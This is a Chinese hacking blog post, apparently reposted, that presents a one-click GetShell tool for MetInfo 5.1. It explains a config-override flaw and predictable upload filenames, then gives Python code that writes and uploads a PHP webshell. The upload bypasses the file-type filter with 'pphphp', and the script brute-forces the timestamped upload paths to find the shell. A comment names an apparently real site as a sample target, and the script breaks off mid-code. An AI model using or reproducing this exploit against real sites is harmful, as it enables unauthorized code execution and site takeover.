title: MetInfo V5.1 GetShell一键化工具 date: 2016-06-08 22:40:32 categories: Hacker tags: - Hacker - Tools --- ---------- # 漏洞解析: ---------- **config/config.inc.php** ```php $langoks = $db->get_one("SELECT * FROM $met_lang WHERE lang='$lang'"); if(!$langoks)die('No data in the database,please reinstall.'); if(!$langoks[useok]&&!$metinfoadminok)okinfo('../404.html'); if(count($met_langok)==1)$lang=$met_index_type; $query = "SELECT * FROM $met_config WHERE lang='$lang' or lang='metinfo'";//看这里 $result = $db->query($query); while($list_config= $db->fetch_array($result)){ if($metinfoadminok)$list_config['value']=str_replace('"', '"', str_replace("'", ''',$list_config['value'])); $settings_arr[]=$list_config; if($list_config['columnid']){ $settings[$list_config['name'].'_'.$list_config['columnid']]=$list_config['value']; }else{ $settings[$list_config['name']]=$list_config['value']; } } @extract($settings); ``` ---------- <!--more--> 访问 http:///localhost/metinfo5.1/index.php?lang=metinfo `SELECT * FROM met_config WHERE lang='metinfo' or lang='metinfo'` ---------- ## 文件命名方式: ---------- **/feedback/uploadfile_save.php** ```php srand((double)microtime() * 1000000); $rnd = rand(100, 999); $name = date('U') + $rnd; $name = $name.".".$ext; ``` **文件保存在/upload/file/目录** 命名方式就是时间戳去掉后三位,紧接着一个三位数的随机数 可爆破: 如 http://127.0.0.1/upload/file/1465394396.php ---------- # 一键化利用工具: ---------- **本程序基于python编写** ```python #!/usr/bin/env python #-*- coding: utf-8 -*- import requests import Queue import threading import time import sys headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.10 Safari/537.36'} urls = Queue.Queue() #http://hb.jhxjd.com/upload/file/1441445378.php def bp(urls,time_out): while not urls.empty(): base_url = urls.get() response = None try: time.sleep(int(time_out))#延时设置 response = requests.get(base_url,headers=headers) if response.status_code == 404: print 'Not Fount----%s ' % base_url except: continue finally: if response: with open('url.txt','a+') as f: f.write('%s?e=YXNzZXJ0 '%base_url) def main(target_url,thread_num,time_out): #取出当前时间戳并删除后四位 now = str(int(time.time()))[:-4] #将所有的待爆破地址遍历并加入队列 for i in range(0,10): for j in range(100,1000): num_str = ''.join((str(i),str(j))) url = ''.join(('%s/upload/file/%s' % (target_url,now),num_str,'.php')) urls.put(url) #上传文件 with open('xiaoma.php','w+') as fi: fi.write("<?php $e = $_REQUEST['e'];register_shutdown_function(base64_decode($e), $_REQUEST['Akkuman']);?>") data = { 'fd_para[1][para]':'filea', 'fd_para[1][type]':'5' } files = {'filea': open("xiaoma.php", 'rb')} upload_url = '%s/feedback/uploadfile_save.php?met_file_format=pphphp&met_file_maxsize=9999&lang=metinfo' % target_url res = requests.post(upload_url,data = data,files=files) #等待两秒 文件上传 time.sleep(2)
---转载
hacktech.cn|53xiaoshuo.com